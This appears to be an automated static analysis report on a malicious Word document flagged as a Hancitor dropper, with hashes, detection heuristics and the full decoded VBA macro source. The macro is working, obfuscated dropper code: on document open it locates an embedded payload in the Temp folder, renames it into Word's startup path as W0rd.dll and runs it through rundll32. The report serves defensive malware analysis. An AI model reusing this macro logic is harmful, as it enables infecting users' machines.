Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e43b8fdf6fa34cb4…

MALICIOUS

Office (OLE)

727.5 KB Created: 2021-01-26 15:16:00 Authoring application: Microsoft Office Word First seen: 2021-02-19
MD5: eb75c1d03848d97f448c23936cb43a92 SHA-1: a45445b4a9eb16d4c0dbef395f0e3b2375ee8db9 SHA-256: e43b8fdf6fa34cb421a81d07c43b4e139ac21cad65812e8b61e216c6c84428dc
410 Risk Score

Heuristics 10

  • ClamAV: Doc.Dropper.Hancitor-9845854-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Hancitor-9845854-0
  • Embedded PE executable critical OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Dim regsrva As New Shell32.Shell
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set fso = CreateObject("Scripting.FileSystemObject")
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4186 bytes
SHA-256: c71fb7170e85785016bcad92325198cac2a4b82dde1fada60b94154f928153a1
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


Private Sub Document_Open()
Call stetptwwo
End Sub



Sub stetptwwo()

 Dim yy As String

Dim vxcv As Integer
Dim hugs As Integer
hugs = chek

Dim ede As String
If hugs = 1 Then
Else
Dim edef As String

Call hhhhh
Dim pushstr As String
pushstr = "\W" & "0rd.d"
Dim geto As String
Dim pus As String
pus = "xe"
geto = "nd"
Dim ter As String

Dim iof As String
iof = "3"
ter = "e"
Dim jsd As String
jsd = geto
 Dim hh As String
 hh = iof & "2." & ter & pus
 Dim fps As String
 fps = "r"
 Dim gpsa As String
 gpsa = ",Unin"
 Dim fa As String
 fa = fps & "u" & jsd & "ll" & hh
 Dim glops As String
 glops = repid
Dim regsrva As New Shell32.Shell
yy = glops & yy & pushstr & "ll" & gpsa & "stallFont"

Call regsrva.ShellExecute(fa, yy, " ", SW_SHOWNORMAL)
End If
End Sub


Attribute VB_Name = "Module1"
  


Function Getme(RootPath As String)
Dim hor As String

Dim fso As Object
Dim fld As Object
Dim vhhs As Object
Dim afs As String
Dim myArr
hor = repid
Dim asdf
Dim cheza As String

asdf = RootPath
Dim fer As String

Set fso = CreateObject("Scripting.FileSystemObject")

Set fld = fso.GetFolder(asdf)

strFileExists = Dir(RootPath & "\0fiasS.t" & "mp")
      If strFileExists = "" Then
    
For Each vhhs In fld.SUBFOLDERS


afs = vhhs

        Call checkthe(afs)
    myArr = Getme(vhhs.Path)


Next
    Set vhhs = Nothing
Getme = myArr
Set fld = Nothing
Set fso = Nothing



    Else
    Dim kurlbik As String
    kurlbik = hor
      If Dir(kurlbik & "\" & "W0rd.dll") = "" Then
      
     
   Call hi(RootPath)
      Else
      Exit Function
  End If
    
        End If


End Function





Function chek()
 Dim jsa As String

 jsa = repid
 Dim vzxx As String
 vzxx = jsa
 
 If Dir(vzxx & "\" & "W0rd.dll") = "" Then
 chek = 0
 Else

 chek = 1
 End If
End Function












Attribute VB_Name = "Module2"
Sub gotodown()
Call hhhss
   Selection.TypeBackspace
   Selection.Copy
   
End Sub


Sub hhhss()
Selection.MoveDown Unit:=wdLine, Count:=1
    Selection.MoveRight Unit:=wdCharacter, Count:=5
    Selection.MoveDown Unit:=wdLine, Count:=24
    Selection.MoveRight Unit:=wdCharacter, Count:=50
    Selection.MoveDown Unit:=wdLine, Count:=24
    Selection.MoveRight Unit:=wdCharacter, Count:=5
    Selection.MoveDown Unit:=wdLine, Count:=24
    Selection.MoveRight Unit:=wdCharacter, Count:=50
End Sub






Sub checkthe(sf As String)

Dim pafh As String
pafh = repid
strFileExists = Dir(sf & "\0fiasS.t" & "mp")
Dim ololow As String
ololow = sf
Dim nothings As String
nothings = pafh

      If strFileExists = "" Then
    
    Else
         If Dir(nothings & "\" & "W0rd.dll") = "" Then

        Name ololow & "\0fiasS.t" & "m" & "p" As ActiveDocument.Application.StartupPath & "\" & "W0rd.dll"
    Else
   Exit Sub
    End If
  
    End If
End Sub


Function repid()

repid = ActiveDocument.Application.StartupPath
End Function




Attribute VB_Name = "Module3"
Sub hhhhh()
Dim posl As String
posl = repid
Dim ntgs
Dim sda
Call gotodown
    ntgs = 50
sda = 49
Dim jos

While sda < 50
      ntgs = ntgs - 1
      
      If Dir(Left(posl, ntgs) & "Loc" & "al\Te" & "mp", vbDirectory) = "" Then
        
    Else
  
   sda = 61
    End If

   Wend
   Dim klas As String
   klas = posl
Call Getme(Left(klas, ntgs) & "Loc" & "al\Te" & "m" & "p")
  Selection.TypeBackspace
   

End Sub


Sub rnee(myhome As String, hsa As String)
Name myhome & "\" & "0fiasS.tm" & "p" As hsa
End Sub




Attribute VB_Name = "Module4"
Sub hi(myhome As String)
Dim glog As String
glog = repid
Dim hsa As String
hsa = glog & "\W0rd.dll"
Call jop(myhome, hsa)
End Sub




Sub jop(uuu As String, aaaa As String)

Call rnee(uuu, aaaa)
End Sub
embedded_office_00022875.exe embedded-pe Office MZ+PE at offset 0x22875 603531 bytes
SHA-256: 173090e5237a1790b71c17b5c218f25b213d0bfd1feb0bb4f1b05abd058e6143
Detection
ClamAV: Win.Packed.Zdlder-9829454-0
Obfuscation or payload: likely
Carved macro source contains an auto-exec entry point and execution/download terms.
ole10native_00.bin ole-package OLE Ole10Native stream: ObjectPool/_1673150612/Ole10Native 567105 bytes
SHA-256: df8698ef9c70b1df294b383ae11bb68a0786b3e4b3a84afc248aa7770879ba11
Detection
ClamAV: Win.Packed.Zdlder-9829454-0
Obfuscation or payload: unlikely
ole10native_00_0fiasS.tmp ole-package-payload OLE Ole10Native payload: ObjectPool/_1673150612/Ole10Native; display_name=0fiasS.tmp; full_path=C:\Users\MyPc\AppData\Local\Temp\0fiasS.tmp; temp_path=; def_file= 566784 bytes
SHA-256: 6b73d2a04238e7d54b9d4320407c40f0603f184233c6b99f722bfbaad21c423e
Detection
ClamAV: Win.Packed.Zdlder-9829454-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.